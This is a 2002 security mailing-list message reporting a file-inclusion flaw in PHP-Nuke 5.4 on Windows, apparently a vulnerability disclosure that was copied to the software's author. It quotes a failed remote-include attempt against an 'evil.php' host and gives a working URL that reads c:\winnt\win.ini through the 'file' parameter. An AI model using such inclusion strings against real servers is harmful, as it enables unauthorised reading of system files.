On Mon, 21 Jan 2002 09:48:16 -0700 (MST), you wrote: >Roman, > >I'll approve the post you sent yesterday. Dave, I haven't seen my post in bugtraq. Perhaps did you forget it? I've included the fixed version of the post so you can directly cc to bugtraq, if you consider it appropiate. Cheers. --Rom. ------------------------ Hi. I did some quick tests on a php-nuke running on Apache for *Windows*. PHPNuke version I tested was 5.4 (which is the last release of phpnuke at the time of testing). I couldn't reproduce your exploit. I always get something like: Warning: Failed opening 'http://attackingwebserver/evil.php' for inclusion (include_path='') in c:\php\index.php on line 113 Nevertheless I realized that this other URL works: http://victimserver/index.php?file=c:\winnt\win.ini The former exploit shows the contens of win.ini file. At least it worked for me :-) Since phpnuke tested version is the last version at the time of writing, I cc'ed this to Francisco Burzi (phpnuke author) 'cause it seems like new stuff. This happened during last week. Greetz, --RoMaNSoFt
